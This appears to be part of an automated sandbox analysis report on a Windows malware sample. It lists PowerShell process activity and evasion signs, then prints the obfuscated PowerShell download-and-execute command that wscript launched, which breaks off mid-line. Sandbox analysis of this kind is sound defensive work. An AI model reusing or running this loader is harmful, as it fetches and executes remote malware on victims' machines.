              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4439Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5478Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6123Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3639Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: PING.EXE, 00000002.00000002.1365150966.00000263F3269000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1525972430.000002D2E93FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7608.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7852, type: MEMORYSTR
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$cJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#hogherd chimariko colonizabilities sternebra #>;$outdoorsy='familienavnets';<#durum startelementernes clangorously substantify starthullernes #>;$programmeringssprogets=$wane+$host.ui; function tollhouse($lao){if ($programmeringssprogets) {$abasements++;}$vaticinating=$aaremaalsstillingers48+$lao.'length'-$abasements; for( $nonlinear228=4;$nonlinear228 -lt $vaticinating;$nonlinear228+=5){$humanlike=$nonlinear228;$betting+=$lao[$nonlinear228];$erantissenes='chefassistenters';}$betting;}function profitmagere($shoetrees){ . ($forstbotanikker) ($shoetrees);}$skubbe=tollhouse 'forlmanagoslngzf reiprosl eeklgodvadjel/land ';$gangava=' bef[milincuare ddbt ige.gemashis,e pharmuldv ielievenc bi,e .ejp adolikiidensnrelotsnigmmenyainfrn s.iatemegbo reinkardodo]mads:nona: regsr,tueranucs nkufor ruddais nhtunavy k npo.dirdentomedltsve oredncstopode ol tro mini=be,p ';$skubbe+=tollhouse 'f,ib5 es.over0lukk pal.(op pw i filoxinpe sd arkomicrwvivisudes ,onngalltmoan tids1pre.0 tem.in,e0ll b;nost in ewstriisheencray6pr s4hel ;vand nitwxlini6 sk 4 ude; ev gerwennvukri:tryk1taco3yttr1cler.klde0up r)stor ogig useor.ac hokteguoluft/ kl 2afbi0opru1,hul0hydr0giav1soll0sign1l.ig rec fha.di polrslebebe ifr poobagaxaf e/toyl1euda3 ta.1.ran.ko.k0e bl ';$gangava+='sole[prognweeveufortquin.goneselskedialcintruaflnrferrivelotinteyde eppo wrholko statlineo skrcsurpoc,rolddmatmaliyeurypmonke pri]inbu ';$dendrochronologically=tollhouse 'bofoubr.es foregrovr egl- hvearesmg an.e ,lunla nt .nd ';$galvanism=tollhouse 'be,rhvejatconstes.hpt.rssgrun:fred/parm/ p idreklelithsrubie.nteualsirker iudsp-enear desooptimbiv.amelanb goib,viatils.,assrbestotraf/aro bwambe stonovern abnimeten r cgudnatoverogro.npara.umisj b.lpoverbafst ';$play=tollhouse ' org>dec, ';$forstbotanikker=tollhouse ' unligenoe locx gud ';$relais20='cruzieros';$gangava+='fora: por:unidtundilbrugsbril1la i2rm.u ';$resurgence='\ghastily.kri';profitmagere (tollhouse 'samm$w lfg lenlpustofluob h na klilvolt:ethebforea,urvlfa csrepraev.cmsectevandrtakeimadon ighgi teepre r psyna pee igg=ano,$ aceeforknstatvdokt:stata ommpfathphabednodaafangtspina cen+afve$pha r unrea.rispalaustr,r au.g us epat ns.cickogee e e ');profitmagere (tollhouse ' dei$.ilfg a.al irnositabfrenastemlinte:deflhoxidobesvrzimmm b oourannopgaesgne=halv$antig preas eellinivunmeaconsn meaibib,sfornmg,og.intestr gpstiglven.i rustarth(a.ti$skdyp isclretsaroseymini)an e ');profitmagere (tollhouse $gangava);$galvanism=$hormone[0];$flugtet=(tollhouse 'tall$retsgirreldepro pobinteaunsul sub:ulopbgen.o bligpa.agpu natidlr losts ak=fraanpulse,eltwmo.i- bomofjedb ankj f.oeafkrcv,detopgr v.ndsge,nysa issno tautoematrmno t. forn,eace atathaem.outiwanatedigrb regcenoplfi,gical e st no ertwund ');profitmagere ($flugtet);profitmagere (tollhouse ' po $ ,ubbruino,pelgs.ydgrh daa tir ieltvauq. mirhadvieha vana ad obeeindsr,alsslati[fled$c
